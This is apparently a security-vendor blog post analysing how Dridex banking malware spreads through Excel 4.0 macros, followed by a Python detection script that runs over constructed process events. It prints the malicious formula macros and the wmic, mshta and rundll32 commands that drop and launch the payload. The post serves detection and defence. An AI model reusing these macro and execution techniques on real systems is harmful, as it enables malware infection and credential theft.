The ASEC analysis team has recently found that the method used to distribute Dridex via Excel files is changing more rapidly and frequently. The team has been covering Dridex distribution methods on the ASEC blog since last year; the most recent related post, uploaded last month, covered an Excel file that uses the Task Scheduler to distribute Dridex. The Excel files distributed recently use Excel 4.0 macros instead of the VBA macros used in previous cases. We assume the attacker made this change to evade detection, and the interval between changes of method is becoming shorter.
The following figures show the content of Excel files that are being distributed as of now. They use various images to trick users into clicking the Enable Macro button.
The macro that performs the malicious activity is an Excel 4.0 macro, not the VBA macro used previously. When macros are enabled, the formulas in the cells are executed automatically through an Auto_Open entry that exists in a hidden sheet, and they carry out the malicious activity.
Through Auto_Open, the malicious formula macros are run in the following order, creating and then running a malicious file.
- Malicious Formula Macros
=FOPEN(GET.NOTE(Macro1!$A$3, 1, 200), 1+2)
=EXEC(GET.NOTE(Macro1!$A$4, 1, 200))
The malicious data used in this stage is dispersed across cells that have notes attached. The notes are hidden, but the Show/Hide Note feature can be used to view the malicious data. The data stored in the notes holds the path where the file is created and the command that runs it. The content of the created file is stored as decimal values in a fixed cell range (D160:AR521).
The created malicious file is saved in the ProgramData folder with the sct extension and executed through the wmic command.
- File Creation Path
- File Execution Command
wmic process call create 'mshta C:\ProgramData\fCLjKsEAHjoxErF.sct'
Below is part of the code of the created sct file, which is obfuscated with a large number of comments. When the file is run, it creates an additional sct file in the ProgramData folder. This additionally created file is responsible for running the dll file that is created later.
The file then attempts to connect to 5 URLs to download a malicious file and saves it in the ProgramData folder with the dll extension. The downloaded dll was confirmed to be Dridex.
- Download URL
After downloading the malware, the file runs the additionally created sct file.
The following shows part of the code of the additionally created sct file. Once it is run, it executes the downloaded Dridex dll with the following command.
- File Execution Command
wmic process call create "rundll32.exe C:\\ProgramData\ljneLUpdLaTjomtIyXuy.dll GetDesktopDPI"
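The two wmic commands above give defenders a concrete process chain to hunt for: an Office process spawning wmic.exe with "process call create", and mshta.exe or rundll32.exe loading an .sct or .dll dropped under ProgramData. The following is an added example (not code from the original post) that runs that logic over constructed Sysmon-style process-creation events; it also relies on the fact that processes started through WMI appear with WmiPrvSE.exe as their parent, which is stated here as an assumption about the telemetry rather than something the post describes.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample events modelled on the chain described in the post
# (Sysmon Event ID 1 reduced to three fields). Not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic process call create 'mshta C:\\ProgramData\\fCLjKsEAHjoxErF.sct'",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta C:\\ProgramData\\fCLjKsEAHjoxErF.sct",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\ProgramData\\ljneLUpdLaTjomtIyXuy.dll GetDesktopDPI",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    # Benign control: rundll32 with a system DLL, launched by Explorer.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe")
LOLBINS = ("mshta.exe", "rundll32.exe")
# An .sct or .dll path under ProgramData, as used by both stages in the post.
PROGRAMDATA_DROP = re.compile(r"[a-z]:\\programdata\\[^\s'\"]+\.(sct|dll)\b", re.IGNORECASE)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits: List[str] = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    if parent in OFFICE_APPS and image == "wmic.exe" and "process call create" in cmd.lower():
        hits.append("office_spawns_wmic_process_create")
    if image in LOLBINS and PROGRAMDATA_DROP.search(cmd):
        hits.append("lolbin_loads_programdata_drop")
    # Assumption: a process created via WMI has WmiPrvSE.exe as its parent.
    if image in LOLBINS and parent == "wmiprvse.exe":
        hits.append("wmi_spawned_lolbin")
    return hits

def detect(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every match, in event order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(idx, rule, SAMPLE_EVENTS[idx]["CommandLine"])
```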
Dridex is banking malware that collects user information related to online banking. It can also download its main module through a loader to perform additional malicious behaviors. In the past, there have been cases of this malware distributing DoppelPaymer, BitPaymer, and CLOP ransomware. Because the Excel files that distribute Dridex are continuously changing, and files containing malicious macros are mainly distributed through spam mails, users should refrain from opening files from unknown sources and take caution.
[Previous Blog Posts about Dridex Distributed via Excel]